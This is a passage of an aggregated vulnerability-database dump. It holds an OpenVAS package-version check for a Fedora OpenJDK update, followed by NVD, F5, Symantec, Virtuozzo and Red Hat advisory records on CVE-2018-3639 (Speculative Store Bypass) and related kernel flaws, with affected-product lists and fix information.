value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MVJPIB5F47XZKGHTCH72DZXO2VHYGE3Q\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.8.0-openjdk'\n package(s) announced via the FEDORA-2019-3f9a71578d advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"java-1.8.0-openjdk on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"java\", rpm:\"java~1.8.0~openjdk~1.8.0.201.b09~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "Fedora Local Security Checks", "pluginID": "1361412562310875475", "scheme": null}
{"cve": [{"lastseen": "2019-10-16T17:30:09", "bulletinFamily": "NVD", "description": "Systems with microprocessors utilizing speculative execution and speculative execution of memory reads before the addresses of all prior memory writes are known may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis, aka Speculative Store Bypass (SSB), Variant 4.", "modified": "2019-05-23T15:29:00", "id": "CVE-2018-3639", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-3639", "published": "2018-05-22T12:29:00", "title": "CVE-2018-3639", "type": "cve", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "f5": [{"lastseen": "2020-02-16T22:32:35", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned IDs 721319, 721555, and 721556 (BIG-IP), ID 721949 (BIG-IQ), ID 721945 (Enterprise Manager), and CPF-24903 and CPF-24904 (Traffix) to this vulnerability.\n\nTo determine if your product and version have been evaluated for this vulnerability, refer to the **Applies to (see versions)** box. To determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table. For more information about security advisory versioning, refer to [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>).\n\nProduct | Branch | Versions known to be vulnerable | Fixes introduced in | Severity | CVSSv3 score1 | Vulnerable component or feature \n---|---|---|---|---|---|--- \nBIG-IP (LTM, AAM, AFM, Analytics, APM, ASM, DNS, Edge Gateway, FPS, GTM, Link Controller, PEM, WebAccelerator) | 14.x | 14.0.0 - 14.1.0 | None | Medium | [5.6](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N>) | F5 hardware platforms* \n13.x | 13.0.0 - 13.1.1 | None \n12.x | 12.1.0 - 12.1.4 | None \n11.x | 11.2.1 - 11.6.3 | None \nARX | 6.x | None | Not applicable | Not vulnerable | None | None \nEnterprise Manager | 3.x | 3.1.1 | None | Medium | [4.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N>) | F5 hardware platforms* \nBIG-IQ Centralized Management | 6.x | 6.0.0 | None | Medium | [4.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N>) | F5 hardware platforms* \n5.x | 5.0.0 - 5.4.0 | None \n4.x | 4.6.0 | None \nBIG-IQ Cloud and Orchestration | 1.x | 1.0.0 | None | Medium | [4.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N>) | F5 hardware platforms* \nF5 iWorkflow | 2.x | 2.1.0 - 2.3.0 | None | Medium | [4.3](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N>) | F5 hardware platforms* \nTraffix SDC | 5.x | 5.0.0 - 5.1.0 | None | Medium | [5.6](<https://first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N>) | F5 hardware platforms* \n4.x | 4.4.0 | None \n \n1The CVSSv3 score link takes you to a resource outside of AskF5, and it is possible that the document may be removed without our knowledge.\n\n*For information about the affected hardware platforms, refer to the **Vulnerable platforms** section.\n\nVulnerable platforms\n\nSome platforms may have processors from multiple vendors and may have a vulnerable ARM processor in one or more subsystems. F5 investigated the use of ARM processors and, while vulnerable processors are used, those processors do not handle privileged information; they are limited to running signed firmware from F5 with no capability to execute user-specified code.\n\nThe following tables list only one entry for platform models that have several variants. For example, BIG-IP 11000, BIG-IP 11050, BIG-IP 11050F, and BIG-IP 11050N are all vulnerable and included in the table as \"BIG-IP 110x0.\" \n\nBIG-IP \n\nModel | Processor types | Vulnerable \n---|---|--- \nVIPRION B21x0 | Intel | Y \nVIPRION B2250 | Intel | Y \nVIPRION B4100 | AMD | Y* \nVIPRION B4200 | AMD | Y* \nVIPRION B43x0 | Intel | Y \nVIPRION B44x0 | Intel | Y \nBIG-IP 2xx0 | Intel | Y \nBIG-IP 4xx0 | Intel | Y \nBIG-IP 5xx0 | Intel | Y \nBIG-IP 7xx0 | Intel | Y \nBIG-IP 10xxx | Intel | Y \nBIG-IP 12xx0 | Intel | Y \nBIG-IP i2x00 | Intel, ARM | Y \nBIG-IP i4x00 | Intel, ARM | Y \nBIG-IP i5x00 | Intel, ARM | Y \nBIG-IP i7x00 | Intel, ARM | Y \nBIG-IP i10x00 | Intel, ARM | Y \nBIG-IP 800 | Intel | Y \nBIG-IP 1600 | Intel | Y \nBIG-IP 3600 | Intel | Y \nBIG-IP 3900 | Intel | Y \nBIG-IP 6900 | AMD | Y* \nBIG-IP 89x0 | AMD | Y* \nBIG-IP 110x0 | AMD | Y* \nBIG-IP 6400 | AMD | Y* \n \n*F5 believes these platforms are vulnerable, but AMD has yet to confirm. AMD has not published plans to provide fixes for these CPUs.\n\nBIG-IQ, Enterprise Manager, FirePass, and ARX\n\nModel | Processor type | Vulnerable \n---|---|--- \nBIG-IQ 7000 | Intel | Y \nEnterprise Manager 4000 | Intel | Y \nFirePass 12xx | Intel | N \nFirePass 41xx | AMD | Y* \nFirePass 43xx | AMD | Y* \nARX 1500+ | Intel | Y \nARX 2500 | Intel | Y \nARX 4000/4000+ | Intel | Y \n \n*Intel and AMD have not responded to repeated requests for information about the processors in these platforms. Therefore, based on their general public statements, we must assume that they are vulnerable.\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Fixes introduced in** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nNone\n\n * [K51812227: Understanding Security Advisory versioning](<https://support.f5.com/csp/article/K51812227>)\n * [K41942608: Overview of Security Advisory articles](<https://support.f5.com/csp/article/K41942608>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K9502: BIG-IP hotfix and point release matrix](<https://support.f5.com/csp/article/K9502>)\n * [K48955220: Installing an OPSWAT Endpoint Security update on BIG-IP APM systems (11.4.x and later)](<https://support.f5.com/csp/article/K48955220>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>)\n", "modified": "2019-07-01T18:29:00", "published": "2018-07-10T21:22:00", "id": "F5:K29146534", "href": "https://support.f5.com/csp/article/K29146534", "title": "SSB Variant 4 vulnerability CVE-2018-3639", "type": "f5", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "symantec": [{"lastseen": "2019-10-09T00:30:35", "bulletinFamily": "software", "description": "### Description\n\nMultiple CPU Hardware are prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in further attacks.\n\n### Technologies Affected\n\n * ARM Cortex A15 \n * ARM Cortex A57 \n * ARM Cortex A72 \n * IBM AIX 5.3 \n * IBM AIX 6.1 \n * IBM AIX 7.1 \n * IBM Aix 7.2 \n * IBM Vios 2.2.0 \n * Intel 2nd generation Core processors \n * Intel 3rd generation Core processors \n * Intel 4th generation Core processors \n * Intel 5th generation Core processors \n * Intel 6th generation Core processors \n * Intel 7th generation Core processors \n * Intel 8th generation Core processors \n * Intel Atom Processor A Series \n * Intel Atom Processor C Series \n * Intel Atom Processor E Series \n * Intel Atom Processor T Series \n * Intel Atom Processor X Series \n * Intel Atom Processor Z Series \n * Intel Celeron Processor J Series \n * Intel Celeron Processor N Series \n * Intel Core M processor family \n * Intel Core X-series Processor Family for Intel X299 platforms \n * Intel Core X-series Processor Family for Intel X99 platforms \n * Intel Pentium Processor J Series \n * Intel Pentium Processor N Series \n * Intel Pentium Processor Silver Series \n * Intel Xeon Processor E3 Family \n * Intel Xeon Processor E3 v2 Family \n * Intel Xeon Processor E3 v3 Family \n * Intel Xeon Processor E3 v4 Family \n * Intel Xeon Processor E3 v5 Family \n * Intel Xeon Processor E3 v6 Family \n * Intel Xeon Processor E5 Family \n * Intel Xeon Processor E5 v2 Family \n * Intel Xeon Processor E5 v3 Family \n * Intel Xeon Processor E5 v4 Family \n * Intel Xeon Processor E7 Family \n * Intel Xeon Processor E7 v2 Family \n * Intel Xeon Processor E7 v3 Family \n * Intel Xeon Processor E7 v4 Family \n * Intel Xeon processor 3400 series \n * Intel Xeon processor 3600 series \n * Intel Xeon processor 5500 series \n * Intel Xeon processor 5600 series \n * Intel Xeon processor 6500 series \n * Intel Xeon processor 7500 series \n * Microsoft Surface Book 2 \n * Microsoft Surface Laptop \n * Microsoft Surface Pro 3 \n * Microsoft Surface Pro 4 \n * Microsoft Surface Pro Model 1796 \n * Microsoft Surface Pro with Advanced LTE Model 1807 \n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for 64-bit Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 R2 for x64-based Systems (Server Core instal SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems (Server Core installation SP2 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems (Server Core installat SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * NetApp SolidFire Element OS Management Node \n * Oracle Solaris 11 \n * Redhat Enterprise Linux Desktop 6 \n * Redhat Enterprise Linux Desktop 7 \n * Redhat Enterprise Linux EUS Compute Node 6.7 \n * Redhat Enterprise Linux EUS Compute Node 7.3 \n * Redhat Enterprise Linux EUS Compute Node 7.4 \n * Redhat Enterprise Linux EUS Compute Node 7.5 \n * Redhat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 7.3 \n * Redhat Enterprise Linux Server (for IBM Power LE) - Update Services for SAP Solutions 7.4 \n * Redhat Enterprise Linux Server - AUS 6.6 \n * Redhat Enterprise Linux Server - AUS 7.2 \n * Redhat Enterprise Linux Server - AUS 7.3 \n * Redhat Enterprise Linux Server - AUS 7.4 \n * Redhat Enterprise Linux Server - Extended Update Support 6.7 \n * Redhat Enterprise Linux Server - Extended Update Support 7.3 \n * Redhat Enterprise Linux Server - Extended Update Support 7.4 \n * Redhat Enterprise Linux Server - Extended Update Support 7.5 \n * Redhat Enterprise Linux Server - TUS 6.6 \n * Redhat Enterprise Linux Server - TUS 7.2 \n * Redhat Enterprise Linux Server - TUS 7.3 \n * Redhat Enterprise Linux Server - TUS 7.4 \n * Redhat Enterprise Linux Server - Update Services for SAP Solutions 7.2 \n * Redhat Enterprise Linux Server - Update Services for SAP Solutions 7.3 \n * Redhat Enterprise Linux Server - Update Services for SAP Solutions 7.4 \n * Redhat Enterprise Linux Server 6 \n * Redhat Enterprise Linux Server 7 \n * Redhat Enterprise Linux Server AUS 6.4 \n * Redhat Enterprise Linux Server AUS 6.5 \n * Redhat Enterprise Linux Workstation 6 \n * Redhat Enterprise Linux Workstation 7 \n * Redhat Enterprise Linux for ARM 64 7 \n * Redhat Enterprise Linux for IBM System z (Structure A) 7 \n * Redhat Enterprise Linux for IBM z Systems - Extended Update Support 6.7 \n * Redhat Enterprise Linux for IBM z Systems - Extended Update Support 7.3 \n * Redhat Enterprise Linux for IBM z Systems - Extended Update Support 7.4 \n * Redhat Enterprise Linux for IBM z Systems - Extended Update Support 7.5 \n * Redhat Enterprise Linux for IBM z Systems 7 \n * Redhat Enterprise Linux for Power 9 7 \n * Redhat Enterprise Linux for Power, big endian - Extended Update Support 6.7 \n * Redhat Enterprise Linux for Power, big endian - Extended Update Support 7.3 \n * Redhat Enterprise Linux for Power, big endian - Extended Update Support 7.4 \n * Redhat Enterprise Linux for Power, big endian - Extended Update Support 7.5 \n * Redhat Enterprise Linux for Power, big endian 6 \n * Redhat Enterprise Linux for Power, big endian 7 \n * Redhat Enterprise Linux for Power, little endian - Extended Update Supp 7.3 \n * Redhat Enterprise Linux for Power, little endian - Extended Update Supp 7.4 \n * Redhat Enterprise Linux for Power, little endian - Extended Update Supp 7.5 \n * Redhat Enterprise Linux for Power, little endian 7 \n * Redhat Enterprise Linux for Real Time 7 \n * Redhat Enterprise Linux for Real Time for NFV 7 \n * Redhat Enterprise Linux for Scientific Computing 6 \n * Redhat Enterprise Linux for Scientific Computing 7 \n * Redhat Gluster Storage Server for On-premise 3 for RHEL 7 \n * Redhat MRG Realtime 2 \n * Redhat OpenStack 10.0 \n * Redhat OpenStack 12.0 \n * Redhat OpenStack 7.0 \n * Redhat OpenStack 8.0 \n * Redhat OpenStack 9.0 \n * Redhat OpenStack for IBM Power 12.0 \n * Redhat Virtualization - ELS 3 \n * Redhat Virtualization 4 \n * Redhat Virtualization Host 4 \n * Redhat Virtualization Manager 4.2 \n * Redhat Virtualization for IBM Power LE 4 \n * Synology Dsm 5.2 \n * Synology Dsm 6.0 \n * Synology Dsm 6.1 \n * Synology Sky NAS \n * Synology Virtual DSM \n * Ubuntu Ubuntu Linux 14.04 LTS \n * Ubuntu Ubuntu Linux 16.04 LTS \n * Ubuntu Ubuntu Linux 17.10 \n * Ubuntu Ubuntu Linux 18.04 LTS \n * VMWare Fusion 10.0 \n * VMWare Fusion 10.1.1 \n * VMWare Fusion Pro 10.0 \n * VMWare Fusion Pro 10.1.1 \n * VMWare Workstation Player 14.0 \n * VMWare Workstation Player 14.1 \n * VMWare Workstation Player 14.1.1 \n * VMWare Workstation Pro 14.0 \n * VMWare Workstation Pro 14.1 \n * VMWare Workstation Pro 14.1.1 \n * VMWare vCenter Server 5.5 \n * VMWare vCenter Server 6.0 \n * VMWare vCenter Server 6.5 \n * VMWare vCenter Server 6.7 \n * VMWare vSphere ESXi 5.5 \n * VMWare vSphere ESXi 6.0 \n * VMWare vSphere ESXi 6.5 \n * VMWare vSphere ESXi 6.7 \n * Xen Xen \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nGiven the local nature of this issue, grant only trusted and accountable individuals access to affected computers. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-05-21T00:00:00", "published": "2018-05-21T00:00:00", "id": "SMNTC-104232", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104232", "title": "Multiple CPU Hardware CVE-2018-3639 Information Disclosure Vulnerability", "type": "symantec", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "virtuozzo": [{"lastseen": "2019-11-05T11:28:22", "bulletinFamily": "unix", "description": "This update provides a new kernel 2.6.32-042stab130.1 for Virtuozzo 6.0 that is a rebase to the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.30.1.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2018-3639\nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.\n\n", "modified": "2018-05-23T00:00:00", "published": "2018-05-23T00:00:00", "id": "VZA-2018-033", "href": "https://help.virtuozzo.com/customer/portal/articles/2940774", "title": "Important kernel security update: CVE-2018-3639; new kernel 2.6.32-042stab130.1; Virtuozzo 6.0 Update 12 Hotfix 25 (6.0.12-3705)", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-05T11:27:58", "bulletinFamily": "unix", "description": "This update provides a new kernel 2.6.32-042stab130.1 for Virtuozzo Containers for Linux 4.7 and Server Bare Metal 5.0 that is a rebase to the Red Hat Enterprise Linux 6.9 kernel 2.6.32-696.30.1.el6. The new kernel introduces security and stability fixes.\n**Vulnerability id:** CVE-2018-3639\nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.\n\n", "modified": "2018-05-23T00:00:00", "published": "2018-05-23T00:00:00", "id": "VZA-2018-032", "href": "https://help.virtuozzo.com/customer/portal/articles/2940773", "title": "Important kernel security update: CVE-2018-3639; new kernel 2.6.32-042stab130.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-05T11:27:54", "bulletinFamily": "unix", "description": "This hotfix provides security fixes for the hypervisor part of Virtuozzo 6.0 Update 12.\n**Vulnerability id:** CVE-2018-1087\nA flaw was found in the way the Linux kernel's KVM hypervisor handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, the processor did not deliver interrupts and exceptions, rather they are delivered once the first instruction after the stack switch is executed. An unprivileged KVM guest user could use this flaw to crash the guest or, potentially, escalate their privileges in the guest.\n\n**Vulnerability id:** CVE-2018-3639\nAn industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.\n\n", "modified": "2018-05-28T00:00:00", "published": "2018-05-28T00:00:00", "id": "VZA-2018-034", "href": "https://help.virtuozzo.com/customer/portal/articles/2941425", "title": "Important product update: Fixes for CVE-2018-3639 and CVE-2018-1087 in virtual machines; Virtuozzo 6.0 Update 12 Hotfix 26 (6.0.12-3707)", "type": "virtuozzo", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-11-05T11:27:51", "bulletinFamily": "unix", "description": "This update provides a new kernel 2.6.32-042stab132.1 for Virtuozzo 6.0 that is a rebase to the Red Hat Enterprise Linux 6.10 kernel 2.6.32-754.2.1.el6. The new kernel introduces security fixes.\n**Vulnerability id:** CVE-2018-3639\n[x86 AMD] An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.\n\n**Vulnerability id:** CVE-2018-1120\nBy mmap()ing a FUSE-backed file onto a process's memory containing command line arguments (or environment strings), an attacker can cause utilities from psutils or procps (such as ps, w) or any other program which makes a read() call to the /proc/<pid>/cmdline (or /proc/<pid>/environ) files to block indefinitely (denial of service) or for some controlled time (as a synchronization primitive for other attacks).\n\n**Vulnerability id:** CVE-2018-3665\nA Floating Point Unit (FPU) state information leakage flaw was found in the way the Linux kernel saved and restored the FPU state during task switch. Linux kernels that follow the 'Lazy FPU Restore' scheme are vulnerable to the FPU state information leakage issue. An unprivileged local attacker could use this flaw to read FPU state bits by conducting targeted cache side-channel attacks, similar to the Meltdown vulnerability disclosed earlier this year.\n\n**Vulnerability id:** CVE-2018-10872\nA flaw was found in the way the Linux kernel handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, processor does not deliver interrupts and exceptions, they are delivered once the first instruction after the stack switch is executed. An unprivileged system user could use this flaw to crash the system kernel resulting in DoS. This CVE-2018-10872 was assigned due to regression of CVE-2018-8897.\n\n", "modified": "2018-07-16T00:00:00", "published": "2018-07-16T00:00:00", "id": "VZA-2018-048", "href": "https://help.virtuozzo.com/customer/portal/articles/2948376", "title": "Important kernel security update: CVE-2018-3639 (x86 AMD) and other issues; new kernel 2.6.32-042stab132.1; Virtuozzo 6.0 Update 12 Hotfix 29 (6.0.12-3710)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-05T11:28:17", "bulletinFamily": "unix", "description": "This update provides a new kernel 2.6.32-042stab132.1 for Virtuozzo Containers for Linux 4.7 and Server Bare Metal 5.0 that is a rebase to the Red Hat Enterprise Linux 6.10 kernel 2.6.32-754.2.1.el6. The new kernel introduces security fixes.\n**Vulnerability id:** CVE-2018-3639\n[x86 AMD] An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks.\n\n**Vulnerability id:** CVE-2018-1120\nBy mmap()ing a FUSE-backed file onto a process's memory containing command line arguments (or environment strings), an attacker can cause utilities from psutils or procps (such as ps, w) or any other program which makes a read() call to the /proc/<pid>/cmdline (or /proc/<pid>/environ) files to block indefinitely (denial of service) or for some controlled time (as a synchronization primitive for other attacks).\n\n**Vulnerability id:** CVE-2018-3665\nA Floating Point Unit (FPU) state information leakage flaw was found in the way the Linux kernel saved and restored the FPU state during task switch. Linux kernels that follow the 'Lazy FPU Restore' scheme are vulnerable to the FPU state information leakage issue. An unprivileged local attacker could use this flaw to read FPU state bits by conducting targeted cache side-channel attacks, similar to the Meltdown vulnerability disclosed earlier this year.\n\n**Vulnerability id:** CVE-2018-10872\nA flaw was found in the way the Linux kernel handled exceptions delivered after a stack switch operation via Mov SS or Pop SS instructions. During the stack switch operation, processor does not deliver interrupts and exceptions, they are delivered once the first instruction after the stack switch is executed. An unprivileged system user could use this flaw to crash the system kernel resulting in DoS. This CVE-2018-10872 was assigned due to regression of CVE-2018-8897.\n\n", "modified": "2018-07-16T00:00:00", "published": "2018-07-16T00:00:00", "id": "VZA-2018-047", "href": "https://help.virtuozzo.com/customer/portal/articles/2948375", "title": "Important kernel security update: CVE-2018-3639 (x86 AMD) and other issues; new kernel 2.6.32-042stab132.1 for Virtuozzo Containers for Linux 4.7, Server Bare Metal 5.0", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:47:13", "bulletinFamily": "unix", "description": "KVM (Kernel-based Virtual Machine) is a full virtualization solution for\nLinux on a variety of architectures. The qemu-kvm-rhev packages provide the\nuser-space component for running virtual machines that use KVM in\nenvironments managed by Red Hat products.\n\nSecurity fix(es):\n* An industry-wide issue was found in the way many modern microprocessor\ndesigns have implemented speculative execution of Load & Store instructions\n(a commonly used performance optimization). It relies on the presence of a\nprecisely-defined instruction sequence in the privileged code as well as\nthe fact that memory read from address to which a recent memory write has\noccurred may see an older value and subsequently cause an update into the\nmicroprocessor's data cache even for speculatively executed instructions\nthat never actually commit (retire). As a result, an unprivileged attacker\ncould use this flaw to read privileged memory by conducting targeted cache\nside-channel attacks. (CVE-2018-3639)\n\nAcknowledgements:\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center)\nand Jann Horn (Google Project Zero) for reporting this issue.\n\nNote: This is the qemu-kvm-rhev side of the CVE-2018-3639 mitigation that\nincludes support for guests running on hosts with AMD processors.\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, and other related information, refer to the CVE page(s) listed in\nthe References section.", "modified": "2018-07-30T21:29:31", "published": "2018-07-30T21:28:21", "id": "RHSA-2018:2289", "href": "https://access.redhat.com/errata/RHSA-2018:2289", "type": "redhat", "title": "(RHSA-2018:2289) Important: qemu-kvm-rhev security update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:45", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639, x86 AMD)\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es):\n\n* If the cifs_reopen_file() function failed to find a file, the pointer to the cifsFileInfo structure was not reinitialized by being set to \"NULL\". Subsequently, the find_writable_file() function used an invalid pointer to cifsFileInfo. Consequently, the operating system terminated unexpectedly. With this update, the underlying source code has been fixed to reinitialize the pointer to cifsFileInfo as expected. As a result, the operating system no longer crashes due to this bug. (BZ#1577086)", "modified": "2018-07-24T22:18:11", "published": "2018-07-24T22:14:06", "id": "RHSA-2018:2250", "href": "https://access.redhat.com/errata/RHSA-2018:2250", "type": "redhat", "title": "(RHSA-2018:2250) Important: kernel security and bug fix update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:45:59", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3639, PowerPC)\n\nRed Hat would like to thank Ken Johnson (Microsoft Security Response Center) and Jann Horn (Google Project Zero) for reporting this issue.\n\nBug Fix(es) and Enhancement(s):\n\nThese updated kernel packages include also numerous bug fixes and enhancements. Space precludes documenting all of the bug fixes and enhancements in this advisory. See the descriptions in the related Knowledge Article:\nhttps://access.redhat.com/articles/3483021", "modified": "2018-06-12T17:21:30", "published": "2018-06-12T17:15:46", "id": "RHSA-2018:1826", "href": "https://access.redhat.com/errata/RHSA-2018:1826", "type": "redhat", "title": "(RHSA-2018:1826) Important: kernel security, bug fix, and enhancement update", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-08-13T18:46:03", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read 